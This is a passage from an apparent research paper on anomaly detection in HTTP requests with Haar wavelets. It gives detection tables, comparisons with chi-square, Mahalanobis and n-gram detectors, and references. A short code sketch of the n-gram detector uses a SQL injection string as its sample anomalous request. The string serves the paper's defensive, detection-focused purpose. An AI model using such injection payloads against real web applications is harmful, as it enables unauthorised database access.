Similar to the TW1D by rows, a huge number of false positives is obtained for some threshold values, followed by a sudden drop to no detection at all. This behavior indicates that either all single variations are being judged as attacks, or none of them serve as alarm sensors. This is caused by the lack of information to distinguish the variations caused by anomalous behaviors.

6.3 TW1D and best approximation

As pointed out in Sect. 4.4, the first step of the best approximation strategy is the ordering of the entire set of wavelet coefficients in decreasing order. The second step consists of the selection of the NB most significant coefficients in absolute value. The N − NB smaller coefficients are simply not analyzed. The main issue is the choice of the parameter NB.

The performance of the attack detection degrades very fast as the parameter NB increases: for NB > 9 the number of false positives jumps from the order of 10 to the order of 100, and for NB > 29 it reaches the order of 1,000. Since the behavior of the best approximation procedure involving the TW1D and the TW2D is very similar, the results for the unidimensional case are omitted, and the results for the TW2D in association with the best approximation procedure are presented in Sect. 6.5.

6.4 TW2D and hard thresholding

Table 6 presents the detection results obtained by Algorithm 4. It is important to observe that when the correct range for the threshold value is used, the number of false positives is drastically reduced, and for a threshold of 5 times the universal threshold value, no false positives are obtained and all attacks are detected successfully. In [28], a discussion about the choice of 5 times the universal threshold value is presented for a simpler attack sensor.


Table 7 True- and false-positive results for detection with TW2D + best approximation

Attacks   NB greater wavelet coefficients
          1       5        10        20        30          40          50          60          64
          FP TP   FP  TP   FP   TP   FP   TP   FP     TP   FP     TP   FP     TP   FP     TP   FP     TP
0         0  0    13  0    120  0    586  0    1,319  0    1,888  0    2,379  0    2,943  0    3,233  0
1         0  1    13  1    120  1    587  1    1,318  1    1,887  1    2,378  1    2,943  1    3,233  1
2         0  1    13  2    120  2    586  2    1,317  2    1,887  2    2,377  2    2,940  2    3,230  2
3         0  1    13  3    120  3    587  3    1,319  3    1,887  3    2,379  3    2,944  3    3,233  3
4         0  1    13  4    120  4    587  4    1,318  4    1,887  4    2,378  4    2,944  4    3,234  4
5         1  1    17  5    102  5    561  5    1,314  5    1,888  5    2,353  5    2,971  5    3,242  5
10        2  3    19  10   129  10   635  10   1,397  10   1,925  10   2,439  10   3,031  10   3,314  10
20        0  9    14  20   111  20   626  20   1,414  20   1,967  20   2,416  20   3,043  20   3,334  20

PFUNA data set. 59,248 requests without attacks

6.5 TW2D and best approximation

The results obtained for attack identification combining the TW2D and the best approximation method are presented in Table 7. Observe that for small values of NB (in the range of 2–9, as summarized in the column for NB = 5), a small number of false positives is obtained; however, when NB is increased, the number of false positives also increases. This means that the information contained in the wavelet coefficients is in some sense not correctly classified, and consequently the attacks cannot be properly detected. The second refinement step for performing the attack classification is therefore introduced, and the results for this case are presented in the next section.

6.6 TW2D, best approximation and refinement step

In Table 8, the results of the best approximation with refinement (Algorithm 5) are presented for different choices of the parameter α. All attacks inserted in the PFUNA data set were detected, and the algorithm performance shows itself to be sensitive with respect to the refinement parameter α. Recall that α is the factor applied to the convex combination of the significances computed from the three blocks of wavelet coefficients, where significance is the decision quantity indicating whether an alarm has to be set or not.

6.7 TW2D, hard thresholding and refinement step

In order to demonstrate the robustness of the refinement step proposed in Algorithm 5, we replace the best approximation method by the hard threshold operation to select the first set of candidates (first step). All other steps of the algorithm remain unchanged. The results for the same group of numerical experiments are presented in Table 9, considering the parameter α = 1.0. The detection results remained invariant for 1.0 ≤ α < 1.1, and the parameter β remained constant.

Table 8 True- and false-positive results for detection with TW2D + best approximation + refinement

Attacks   α
          1       1.025   1.05    1.075   1.1     1.125
          FP TP   FP TP   FP TP   FP TP   FP TP   FP TP
0         0  0    0  0    0  0    0  0    0  0    0  0
1         0  1    0  1    0  1    0  1    0  1    0  1
2         0  2    0  2    0  1    0  1    0  1    0  1
3         0  3    0  3    0  3    0  0    0  0    0  0
4         0  4    0  4    0  4    0  4    0  0    0  0
5         0  5    0  5    0  0    0  0    0  0    0  0
10        0  10   0  10   0  10   0  10   0  1    0  1
20        0  20   0  20   0  20   0  20   0  11   0  11

PFUNA data set. 59,248 requests without attacks + 20 inserted attacks

It is possible to observe that the refinement step introduces a significant gain in the performance of the alarm sensor proposed in this work, in which the wavelet coefficients of the bidimensional Haar wavelet transform are a key part of the entire computation.

7 Comparisons with other techniques

The two algorithms without a training stage proposed in this work are compared with five other algorithms for detecting anomalies in HTTP requests; all of these five algorithms need a training (preprocessing) stage. The well-established algorithms implemented for comparison are the following:

– “6BIN”: based on the Pearson Chi-square test with group-ing of six bins [21,22].


Table 9 True- and false-positive results for detection with TW2D + hard thresholding + refinement

Attacks   No. of attacks detected for different ρλ
          1λ      1.5λ    2λ      2.5λ    3λ      3.5λ    4λ      5λ
          FP TP   FP TP   FP TP   FP TP   FP TP   FP TP   FP TP   FP TP
0         0  0    0  0    0  0    0  0    0  0    0  0    0  0    0  0
1         0  1    0  1    0  1    0  0    0  0    0  0    0  0    0  0
2         0  2    0  2    0  2    0  1    0  0    0  0    0  0    0  0
3         0  3    0  3    0  3    0  3    0  2    0  0    0  0    0  0
4         0  4    0  3    0  3    0  1    0  1    0  1    0  1    0  1
5         0  5    0  4    0  4    0  2    0  2    0  2    0  0    0  0
10        0  10   0  9    0  8    0  6    0  6    0  7    0  4    0  0
20        0  20   0  18   0  17   0  13   0  11   0  12   0  9    0  0

PFUNA data set. α = 1.0. 59,248 requests without attacks + 20 inserted attacks

Table 10 Comparisons between algorithms

Attacks   Algorithms
          6BIN    3BIN    MD      DBIN    NGRAM   TW2D-HT   TW2D-BA
          FP TP   FP TP   FP TP   FP TP   FP TP   FP  TP    FP  TP
0         0  0    0  0    6  0    0  0    0  0    0   0     0   0
1         0  0    0  0    6  1    0  0    0  1    0   1     0   1
2         0  0    0  0    6  2    0  0    0  2    0   2     0   2
3         0  1    0  0    6  2    0  0    0  3    0   3     0   3
4         0  2    0  0    6  3    0  0    0  4    0   4     0   4
5         0  3    0  0    6  4    0  0    0  5    0   5     0   5
10        0  8    0  0    6  8    0  0    0  10   0   10    0   10
20        0  13   0  0    6  18   0  0    0  20   0   20    0   20

– “3BIN”: based on the Pearson Chi-square test with group-ing of three bins [38].

– “MD”: based on the Mahalanobis distance used in [44].– “DBIN”: based on the Pearson Chi-square test with

dynamic grouping [19].– “NGRAM”: based on n-gram presented by [15]. The

model implemented considers the following: Let c thenumber of n-grams of current request presents in the setof normal n-grams, and t the total number of n-grams incurrent request. If the relation c

t is less that T (T ∈ [0, 1])the current request is considered as anomalous.
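A minimal sketch of this scoring rule (not Ingham's original implementation; the request strings are hypothetical, and distinct n-grams are counted for simplicity):

    def ngrams(s, n=3):
        # Distinct contiguous n-grams of the string s.
        return {s[i:i + n] for i in range(len(s) - n + 1)}

    def is_anomalous(request, normal_ngrams, n=3, threshold=0.95):
        # Flag the request when the fraction c/t of its n-grams also present
        # in the normal set falls below the threshold T.
        grams = ngrams(request, n)
        if not grams:
            return False
        c = sum(1 for g in grams if g in normal_ngrams)
        return c / len(grams) < threshold

    # Training: collect the n-grams of attack-free requests (hypothetical strings).
    normal = set()
    for req in ["id=10&name=abc", "page=2&lang=es"]:
        normal |= ngrams(req)
    print(is_anomalous("id=1%27+union+select+1,2,3--", normal))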

The comparison results are presented in Table 10. The label TW2D-HT (TW2D—hard thresholding with refinement) indicates the algorithm presented in Sect. 5.6, and TW2D-BA (TW2D—best approximation with refinement) the one in Sect. 5.5. For the experimental results shown in Table 10, the training data set for the algorithms NGRAM, MD, 6BIN, 3BIN and DBIN was 100 % of the data set without attacks, presented as Case A of Table 3.

The results shown in Table 10 clearly indicate a superior performance of the two algorithms proposed here with respect to four of the five analyzed options (MD, 6BIN, 3BIN and DBIN). The algorithm NGRAM, when trained with 100 % of the data set without attacks, obtains the same numbers of false positives and true positives as our algorithms.

In the case of the algorithm NGRAM, the threshold considered for the experiments presented here is T = 0.95 (i.e., at least 95 % of the n-grams of the current request must be in the set of normal n-grams for the request to be considered normal). The size of the n-grams used was between 2 and 10, with no variation in the final detection results.

For the algorithms 6BIN and 3BIN, the value assumed as threshold was 10 % of the maximum value of the Chi-square obtained in the training phase. In the case of the algorithm MD, the threshold used was 256. This threshold value allows each character to have a fluctuation range of one standard deviation from its mean, as explained in [44].

The best results given in Table 10 (100 % detection rate without false positives) correspond to NGRAM and the two proposed algorithms. The MD achieves the worst results with respect to the amount of false-positive detections. The 3BIN and the DBIN achieve the worst results with respect to the amount of true-positive detections. The 6BIN algorithm presents 0 % false positives, but it does not detect all attacks.


Fig. 14 Execution time comparisons between algorithms. Average execution time in milliseconds for 10, 100 and 1,000 iterations of the algorithms, labeled 10i, 100i and 1,000i, respectively, below each block. The number of false positives over true positives for a data bank with 10 attacks is given above the blocks. a Using 100 % of the training data, b using 20 % of the training data


In order to have a more complete comparison among the algorithms, the execution time and the detection-rate performance of the five algorithms and the two proposed here are presented in Fig. 14 under two different conditions. In Fig. 14a, the training phase is computed with 100 % of the training data set, and in Fig. 14b only 20 % of the training data set is considered. Again, the training data set is the same as the one used in Case A of Table 3 and Sect. 6.1.

The analyzed data set contains a total of 10 attacks (Case G, Table 3). The reported time estimates are the mean times of 10, 100 and 1,000 executions of the algorithms. In the cases where preprocessing was necessary, the mean corresponds to the mean of each stage of the detection. On top of the blocks representing the mean execution times, both figures present the number of false positives and the number of detected attacks for each algorithm, recalling that the total number of attacks in the data set is 10.

Analyzing the significant variability of the results presented in Fig. 14a, b, one remark is that all five training-phase-dependent algorithms are very sensitive to the amount of data considered for this preprocessing stage, while the two proposed detection algorithms are much more robust, being independent of the choice of the training set. This independence is reflected in the computation time as well as in the correct rate of attack detections. On the contrary, the other five methods presented considerable variations in execution time and detection performance according to the training phase, generating many false positives in the case of Fig. 14b or even not detecting the existing attacks.

8 Related work

This paper has explored the character frequency distribution for intrusion detection in the context of HTTP traffic security, deepening the preliminary study presented in [28]. The approach is based on the observation that for legitimate inputs the relative character frequencies present smooth variations in value. However, malicious input (e.g., buffer overflows) can exhibit large occurrences of a single character and/or of random character values [33]. In this sense, some works in the literature also focus on anomaly-based approaches that analyze character distribution models [19,21,38].

Some anomaly-based approaches that analyze character distribution models have explored machine learning techniques [19,21,38]. These techniques need a step to obtain the normal profile from training data, and so far this remains a challenge [18]. Putting these points into perspective, the approach proposed here, based on the bidimensional wavelet transform and two refinement steps during the decision phase of the sensor design, is simple and computationally cheap, especially because no training phase is necessary. Another positive aspect of the presented approach is the absence of requirements for computing attack-free training data that represent all real activities. Therefore, the main goal of the presented methodology is to explore the analysis of the character distribution in the detection phase, as usually done by machine learning techniques.

For machine learning techniques, the analysis of the character distribution in the detection phase is based on comparisons between two distributions of requests: the normal profile obtained in the training phase and the current requests. For this, statistical tests (such as the Pearson Chi-square test) have been used to obtain the differences between distributions [19,21,38]. The Pearson Chi-square test requires the use of groups, and different grouping criteria have been used in the literature.



The grouping criteria used in the work of Kruegel et al. [21] were defined by the intensity of the relative frequency of each group. In this way, six groups (bins) of characters were determined as follows: {(0), (1–3), (4–6), (7–11), (12–15), (16–255)}. They point out that although the choice of groups is arbitrary, it reflects the fact that the relative frequencies are sorted in descending order [22]. The work of Kiani et al. [19] used grouping criteria such that each group has a frequency greater than or equal to five, a process known as Yates' correction [45]. Another approach to the grouping criteria considered the division of the characters into three groups of the following types: alphabetical characters, numbers and special symbols. Differently from the cited works, this paper does not use any data grouping heuristic. Avoiding the application of an extra grouping algorithm at each iteration decreases the computational cost of the proposed approach.

An anomaly is reported if the values obtained by any approach are above some detection threshold. Therefore, the definition of a threshold value is relevant for any anomaly detection sensor, especially because it is responsible for the classification of normal or anomalous behavior. Defining the threshold value according to each methodology and context can diminish the false-positive rates, and it affects the reliability of the system. The meaning of the chosen threshold value depends on the methodology considered in each work. In [19,21,38], the threshold used is 10 % higher than the maximum value of the data involved in the analysis. Nevertheless, in [21] the threshold value was defined once for the whole process, which can be a problem because traffic data usually present variations that influence the behavior analysis. In this paper, no grouping of data is considered as in the previously mentioned works, and the threshold value is defined specifically for the analysis of the wavelet coefficients involved in the design of the detection sensor.

The main contribution of this work is the systematic evolution presented for the construction of the attack detection sensor based on two layers of decision, both involving different threshold values, which explore the properties of the bidimensional Haar wavelet transform.

9 Conclusion

In this work, a 2D Haar wavelet transform was used as the main ingredient in the construction of an attack detector for HTTP traffic data. The operations responsible for the data selection and classification were the hard thresholding and the best approximation method, both applied directly to the wavelet coefficients generated by the wavelet decomposition. Besides the initial selection step based on the truncated wavelet series, a refinement heuristic was proposed, based on the property that the Haar wavelet transform approximates discrete derivatives of the analyzed data.

In order to clarify many aspects involved in the sensor design, a detailed case study on the application of the one- and bidimensional Haar wavelet transforms associated with both truncation operations was provided. The intrinsic bidimensional aspects of the data were also explored by the selected data structure, and different 3D representations were presented. The reference data set considered for all test validations was the PFUNA data base, where synthetic attacks were introduced in many different windows generated for analysis. The results with respect to the number of correct and wrong detections (true and false positives) were presented for the many cases analyzed, demonstrating the high efficiency of the methodology proposed in this work.

Acknowledgments The first author is supported by a CNPq Postdoctoral Fellowship under number 201457/2010-5.

References

1. Avizienis, A., Laprie, J.C., Randell, B., Landwehr, C.: Basic concepts and taxonomy of dependable and secure computing. IEEE Trans. Dependable Secure Comput. 1(1), 11–33 (2004)

2. Cavnar, W., Trenkle, J.: N-gram-based text categorization. In: SDAIR, pp. 161–175 (1994)

3. Chandola, V., Banerjee, A., Kumar, V.: Anomaly detection: a survey. ACM Comput. Surv. 41(3), 1–58 (2009)

4. CVE-2001-0500 (2011). http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0500. Accessed Dec 2011

5. Damashek, M.: Gauging similarity with n-grams: language-independent categorization of text. Science 5199, 843–848 (1995)

6. Daubechies, I.: Ten Lectures on Wavelets. Society for Industrial and Applied Mathematics, Philadelphia, PA (1992)

7. Donoho, D., Johnstone, I.: Ideal spatial adaptation via wavelet shrinkage. Biometrika 81, 425–455 (1994). doi:10.1093/biomet/81.3.425

8. Donoho, D., Johnstone, I.: Adapting to unknown smoothness via wavelet shrinkage. J. Am. Stat. Assoc. 90, 1200–1224 (1995)

9. Ficco, M., Coppolino, L., Romano, L.: A weight-based symptom correlation approach to SQL injection attacks. In: Fourth Latin-American Symposium on Dependable Computing, LADC '09, pp. 9–16 (2009). doi:10.1109/LADC.2009.14

10. Fonseca, J., Vieira, M., Madeira, H.: The web attacker perspective—a field study. In: 2010 IEEE 21st International Symposium on Software Reliability Engineering (ISSRE), pp. 299–308 (2010). doi:10.1109/ISSRE.2010.21

11. Forrest, S., Hofmeyr, S., Somayaji, A., Longstaff, T.: A sense of self for Unix processes. In: IEEE Symposium on Security and Privacy, pp. 120–128 (1996)

12. Ghosh, A., Schwartzbard, A., Schatz, M.: Learning program behavior profiles for intrusion detection. In: USENIX Workshop on Intrusion Detection and Network Monitoring, pp. 51–62 (1999)

13. Grané, A., Veiga, H.: Wavelet-based detection of outliers in financial time series. Comput. Stat. Data Anal. 54(11), 2580–2593 (2010). doi:10.1016/j.csda.2009.12.010


14. Huang, C.T., Thareja, S., Shin, Y.J.: Wavelet-based real time detection of network traffic anomalies. Int. J. Netw. Secur. 6(3), 309–320 (2008)

15. Ingham, K.L.: Anomaly detection for HTTP intrusion detection: algorithm comparisons and the effect of generalization on accuracy. Ph.D. thesis, University of New Mexico (2007)

16. Ingham, K.L., Inoue, H.: Comparing anomaly detection techniques for HTTP. In: Proceedings of the 10th International Conference on Recent Advances in Intrusion Detection, RAID '07, pp. 42–62. Springer, Berlin (2007)

17. Ingham, K.L., Somayaji, A., Burge, J., Forrest, S.: Learning DFA representations of HTTP for protecting web applications. Comput. Netw. 51, 1239–1255 (2007)

18. Jamdagni, A., Tan, Z., Nanda, P., He, X., Liu, R.P.: Intrusion detection using GSAD model for HTTP traffic on web services. In: Proceedings of the 6th International Wireless Communications and Mobile Computing Conference, IWCMC '10, pp. 1193–1197. ACM, New York, NY (2010). doi:10.1145/1815396.1815669

19. Kiani, M., Clark, A., Mohay, G.: Evaluation of anomaly based character distribution models in the detection of SQL injection attacks. In: Third International Conference on Availability, Reliability and Security, ARES 08, pp. 47–55 (2008). doi:10.1109/ARES.2008.123

20. Kruegel, C., Valeur, F., Vigna, G.: Intrusion Detection and Correlation: Challenges and Solutions. Springer-Verlag TELOS, Santa Clara, CA (2004)

21. Kruegel, C., Vigna, G.: Anomaly detection of web-based attacks. In: Proceedings of the 10th ACM Conference on Computer and Communications Security, CCS '03, pp. 251–261. ACM, New York, NY (2003). doi:10.1145/948109.948144

22. Kruegel, C., Vigna, G., Robertson, W.: A multi-model approach to the detection of web-based attacks. Comput. Netw. 48, 717–738 (2005). doi:10.1016/j.comnet.2005.01.009

23. Krueger, T., Gehl, C., Rieck, K., Laskov, P.: TokDoc: a self-healing web application firewall. In: Proceedings of the 2010 ACM Symposium on Applied Computing, SAC '10, pp. 1846–1853. ACM, New York, NY (2010). doi:10.1145/1774088.1774480

24. Krügel, C., Toth, T., Kirda, E.: Service specific anomaly detection for network intrusion detection. In: Proceedings of the 2002 ACM Symposium on Applied Computing, SAC '02, pp. 201–208. ACM, New York, NY (2002). doi:10.1145/508791.508835

25. Lu, W., Ghorbani, A.A.: Network anomaly detection based on wavelet analysis. EURASIP J. Adv. Signal Process. 4, 1–16 (2009). doi:10.1155/2009/837601

26. Mahalanobis, P.: On the generalized distance in statistics. Proc. Natl. Inst. Sci. Calcutta 12, 49–55 (1936)

27. Mallat, S.: A Wavelet Tour of Signal Processing: The Sparse Way, 3rd edn. Elsevier/Academic Press, Amsterdam (2009). With contributions from Gabriel Peyré

28. Mozzaquatro, B., Azevedo, R.P., Nunes, R., Kozakevicius, A., Cappo, C., Schaerer, C.: Anomaly-based techniques for web attacks detection. J. Appl. Comput. Res. 2(2), 112–120 (2011)

29. OWASP: The Open Web Application Security Project: Top 10 web application security risks (2010). http://www.owasp.org/index.php/Top10

30. Patcha, A., Park, J.M.: An overview of anomaly detection techniques: existing solutions and latest technological trends. Comput. Netw. 51(12), 3448–3470 (2007). doi:10.1016/j.comnet.2007.02.001

31. Pearson, K.: On a criterion that a given system of deviations from the probable in the case of a correlated system of variables is such that it can be reasonably supposed to have arisen from random sampling. Philos. Mag. 50, 157–175 (1900)

32. Rieck, K., Laskov, P.: Detecting unknown network attacks using language models. Lecture Notes in Computer Science, vol. 4064, pp. 74–90. Springer, Berlin (2006). doi:10.1007/11790754_5

33. Robertson, W., Vigna, G., Kruegel, C., Kemmerer, R.: Using generalization and characterization techniques in the anomaly-based detection of web attacks. In: Proceedings of the Network and Distributed System Security Symposium (NDSS). San Diego, CA (2006)

34. Robertson, W.K.: Detecting and preventing attacks against web applications. Ph.D. thesis, University of California, Santa Barbara (2009)

35. Scambray, J., Liu, V., Sima, C.: Hacking Exposed Web Applications. McGraw-Hill, New York (2011)

36. Singh, G., Masseglia, F., Fiot, C., Marascu, A., Poncelet, P.: Data mining for intrusion detection: from outliers to true intrusions. In: Theeramunkong, T., Kijsirikul, B., Cercone, N., Ho, T.B. (eds.) Advances in Knowledge Discovery and Data Mining. Lecture Notes in Computer Science, vol. 5476, pp. 891–898. Springer, Berlin (2009)

37. Song, Y., Keromytis, A., Stolfo, S.: Spectrogram: a mixture-of-Markov-chains model for anomaly detection in web traffic. In: Proceedings of the 16th Annual Network and Distributed System Security Symposium (NDSS), San Diego, pp. 121–135. Internet Society (2009)

38. Sriraghavan, R., Lucchese, L.: Data processing and anomaly detection in web-based applications. In: IEEE Workshop on Machine Learning for Signal Processing, MLSP 2008, pp. 187–192 (2008). doi:10.1109/MLSP.2008.4685477

39. Stollnitz, E., DeRose, A., Salesin, D.: Wavelets for computer graphics: a primer, part 1. IEEE Comput. Graph. Appl. 15(3), 76–84 (1995). doi:10.1109/38.376616

40. Su, Z., Wassermann, G.: The essence of command injection attacks in web applications. SIGPLAN Not. 41, 372–382 (2006). doi:10.1145/1111320.1111070

41. CVE: Common Vulnerabilities and Exposures (2011). http://www.cve.mitre.org. Accessed Dec 2011

42. Wagner, R., Fontoura, L.M., Nunes, R.C.: Tailoring Rational Unified Process to contemplate the SSE-CMM. In: Latin American Conference on Informatics, CLEI 2011. Quito, Ecuador (2011)

43. Wang, K., Parekh, J., Stolfo, S.: Anagram: a content anomaly detector resistant to mimicry attack. In: Recent Advances in Intrusion Detection (RAID), pp. 226–248 (2006)

44. Wang, K., Stolfo, S.: Anomalous payload-based network intrusion detection. In: Jonsson, E., Valdes, A., Almgren, M. (eds.) Recent Advances in Intrusion Detection. Lecture Notes in Computer Science, vol. 3224, pp. 203–222. Springer, Berlin (2004)

45. Yates, F.: Contingency tables involving small numbers and the χ2 test. Suppl. J. R. Stat. Soc. 1(2), 217–235 (1934)

46. Zhou, Z., Zhongwen, C., Tiecheng, Z., Xiaohui, G.: The study on network intrusion detection system of Snort. In: 2010 2nd International Conference on Networking and Digital Society (ICNDS), vol. 2, pp. 194–196 (2010). doi:10.1109/ICNDS.2010.5479341
